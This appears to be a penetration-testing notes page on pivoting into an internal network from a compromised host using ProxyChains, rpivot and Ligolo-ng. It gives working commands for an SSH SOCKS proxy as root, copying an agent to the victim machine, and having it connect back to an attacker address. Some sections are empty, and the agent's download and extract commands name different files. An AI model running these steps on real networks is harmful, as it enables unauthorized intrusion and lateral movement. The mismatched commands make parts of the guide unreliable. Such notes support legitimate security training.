Pivoting

You have access to a machine. That has a second interface.

ProxyChains

We can use the following command to check the open ports in listening mode.

Then we can actually establish a ssh proxy

ssh -f -N -D 9050 -i pivot [email protected]
Component
Description

ssh

Secure Shell client, used to connect securely to another machine.

-f

Requests ssh to go into the background just before command execution. Useful for background tasks.

-N

Tells ssh not to execute any command on the remote host (used just for port forwarding).

-D 9050

Sets up a SOCKS proxy on local port 9050. This means your local apps can use this as a proxy to tunnel traffic through the SSH connection.

-i pivot

Specifies the private key file named pivot to use for authentication.

[email protected]

Connects as the root user to the host 10.10.155.5.

We need to edit this Proxychains file

add the port

Also comment out the DNS line

Now we can use it to run commands through it.

Sshuttle

Rpivot

If we have access to a machine but we do not have credentials. We need python2 on both machines.

LogoGitHub - klsecservices/rpivot: socks4 reverse proxy for penetration testingGitHub

Start server in kali

Now connect back to server

Now we can do our work with proxychains

Chisel

Ligolo

LogoLigolo-ng — Pivoting, Reverse Shells and File TransfersMedium
LogoHow to Use Ligolo-ng (Easy to Follow Pivoting Tutorial)StationX
Updated Tutorial
Logoligolo-ng | Kali Linux ToolsKali Linux
LogoGitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub

First install on kali linux

sudo apt install ligolo-ng

You need the agent from github repo

https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz

Now uncompress it

tar -xvzf ligolo-ng_agent_0.8.2_darwin_amd64.tar.gz

We can now use SCP to transfer that

scp agent [email protected]:/home/privilege

Before running the agent on the compromised host, you must set up the proxy on Kali.

The first step is to create the TUN interface using the following commands. (for kali user)

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

This will create a new TUN interface named ligolo and bring it up. The TUN interface acts as a virtual network interface, allowing Ligolo-ng to route network traffic.

Now lets setup proxy

To start our proxy with the self-cert option, enter the following command:

ligolo-proxy -selfcert

Now we need to connect back the agent

Starting the agent is simple. Simply start the agent from the folder you saved it to. If you're using Linux, ensure it's executable using the chmod +x command. Then, to start the agent and connect it to the Ligolo-ng proxy, run the following command:

./agent -connect 10.10.200.46:11601 -ignore-cert

Once the agent has joined, you’ll see a confirmation message on the proxy screen.

Tunnel Setup

Lastly, before interacting with the internal network, we must set up the tunnel and configure the route to establish a connection.

Let’s run the “session” command, choose our session, and hit enter to interact with our jumpbox (Ubuntu). 

session

From here, we can run “ifconfig” to verify the network interfaces on the connected agent.

Our next step is to add an entry to the routing table so Ligolo can route traffic through the tunnel and reach the target network. To do this, we can use the command:

sudo ip route del 192.168.98.0/24
sudo ip route add 192.168.98.0/24 dev ligolo

Next, you’ll need to start the tunnel and go to the jump box, which you can do by simply entering “start.”

From here, you can run any tool from Kali to interact with the compromised internal network as if you were directly connected to it.

PreviousMiscellaneous MisconfigurationsNextLateral Movement

Last updated